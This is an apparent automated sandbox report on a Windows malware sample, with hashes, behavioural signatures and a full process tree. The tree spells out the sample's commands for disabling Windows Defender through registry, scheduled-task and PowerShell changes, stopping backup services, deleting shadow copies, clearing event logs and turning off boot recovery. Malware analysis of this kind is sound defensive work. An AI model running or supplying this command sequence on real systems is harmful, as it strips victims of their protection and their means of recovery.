Analysis
- Max time kernel: 75s
- Max time network: 3s
- Platform: windows7_x64
- Resource: win7-en-20211208
- Submitted: 13-01-2022 10:00
- Static task: static1
- Behavioral task: behavioral1 (sample 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe, resource win7-en-20211208)
- Behavioral task: behavioral2 (sample 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe, resource win10-en-20211208)

General
- Target: 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
- Size: 3.6MB
- MD5: 5bd555b0d8e12806fbdbbcc3971b1f67
- SHA1: 2da4a3e94754c2f94b5f440a68ac0a3b979d3242
- SHA256: 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d
- SHA512: cc3f5199621435a1d04546a7446557378933ab9f42b5b638b8fbdf4805661ac38312d68801dd017fd1665cfe2a5d26c198b2cfd1b0193389c4891bc0e982e13c
Malware Config
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 2128)
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe, set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 2064), bcdedit.exe (PID 2088)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
  Processes: 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe (file opened for modification under C:\Program Files and C:\Program Files (x86))
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 832)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe (PID 2160), powershell.exe (PID 2244), 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe (PID 1792)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: wevtutil.exe (PIDs 1384, 1716, 564), wmic.exe (PIDs 1620, 1400)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe (PID 1792), net.exe
Processes
(indentation shows tree depth; each entry is image path | command line | PID, followed by the signatures that fired on it)

C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe | "C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe" | PID 1792
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Windows\system32\net.exe | net.exe stop "NetMsmqActivator" /y | PID 520
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "NetMsmqActivator" /y | PID 540
  C:\Windows\system32\net.exe | net.exe stop "SamSs" /y | PID 760
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y | PID 1624
  C:\Windows\system32\net.exe | net.exe stop "SDRSVC" /y | PID 1740
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y | PID 832
  C:\Windows\system32\net.exe | net.exe stop "SstpSvc" /y | PID 1812
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y | PID 360
  C:\Windows\system32\net.exe | net.exe stop "UI0Detect" /y | PID 1788
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y | PID 828
  C:\Windows\system32\net.exe | net.exe stop "VSS" /y | PID 1828
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "VSS" /y | PID 1112
  C:\Windows\system32\net.exe | net.exe stop "wbengine" /y | PID 1068
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y | PID 1928
  C:\Windows\system32\net.exe | net.exe stop "WebClient" /y | PID 1804
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y | PID 1976
  C:\Windows\system32\sc.exe | sc.exe config "NetMsmqActivator" start= disabled | PID 1652
  C:\Windows\system32\sc.exe | sc.exe config "SamSs" start= disabled | PID 680
  C:\Windows\system32\sc.exe | sc.exe config "SDRSVC" start= disabled | PID 1312
  C:\Windows\system32\sc.exe | sc.exe config "SstpSvc" start= disabled | PID 1296
  C:\Windows\system32\sc.exe | sc.exe config "UI0Detect" start= disabled | PID 1756
  C:\Windows\system32\sc.exe | sc.exe config "VSS" start= disabled | PID 1440
  C:\Windows\system32\sc.exe | sc.exe config "wbengine" start= disabled | PID 1304
  C:\Windows\system32\sc.exe | sc.exe config "WebClient" start= disabled | PID 1672
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f | PID 584
  C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f | PID 1528
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f | PID 1524
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f | PID 272
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f | PID 1544
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f | PID 432
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f | PID 1112
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f | PID 1612
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f | PID 1476
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f | PID 1360
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f | PID 1632
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f | PID 316
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f | PID 384
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f | PID 920
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f | PID 1572
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f | PID 664
  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable | PID 1416
  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable | PID 1864
  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable | PID 800
  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable | PID 1600
  C:\Windows\system32\schtasks.exe | schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable | PID 1588
  C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f | PID 560
  C:\Windows\system32\reg.exe | reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f | PID 632
  C:\Windows\system32\reg.exe | reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f | PID 804
  C:\Windows\system32\reg.exe | reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f | PID 1776
  C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f | PID 772
  C:\Windows\system32\reg.exe | reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f | PID 916
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f | PID 1408
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f | PID 1548
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f | PID 1868
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f | PID 688
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f | PID 960
    - Modifies security service
  C:\Windows\system32\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f | PID 764
  C:\Windows\system32\vssadmin.exe | vssadmin.exe delete shadows /all /quiet | PID 832
    - Interacts with shadow copies
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl system | PID 1384
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl security | PID 1716
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\wevtutil.exe | wevtutil.exe cl application | PID 564
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\Wbem\wmic.exe | wmic.exe SHADOWCOPY /nointeractive | PID 1620
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\System32\Wbem\wmic.exe | wmic.exe shadowcopy delete | PID 1400
    - Suspicious use of AdjustPrivilegeToken
  C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | PID 2064
    - Modifies boot configuration data using bcdedit
  C:\Windows\system32\bcdedit.exe | bcdedit.exe /set {default} recoveryenabled no | PID 2088
    - Modifies boot configuration data using bcdedit
  C:\Windows\system32\cmd.exe | cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All | PID 2108
    C:\Program Files\Windows Defender\MpCmdRun.exe | "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All | PID 2128
      - Deletes Windows Defender Definitions
  C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true | PID 2140
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableIOAVProtection $true | PID 2160
      - Suspicious behavior: EnumeratesProcesses
  C:\Windows\system32\cmd.exe | cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true | PID 2224
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Set-MpPreference -DisableRealtimeMonitoring $true | PID 2244
      - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 5464474b4b4e8ae38c10b2cd2ada30fe
  SHA1: 1f91b4850c26fdcce42aa16c2f571459772f4329
  SHA256: f4a25c2e6153d00d41b9a2db8dcb3c496fa42620638e69c2e40631e40628f4f7
  SHA512: f897951fedafe5788af2335f87118d735977e011e93be3ee91cefcbb142d3aa02338e1181b7e723ddf48f4388f61d9297f8cb70a302df6946b400056c401e59d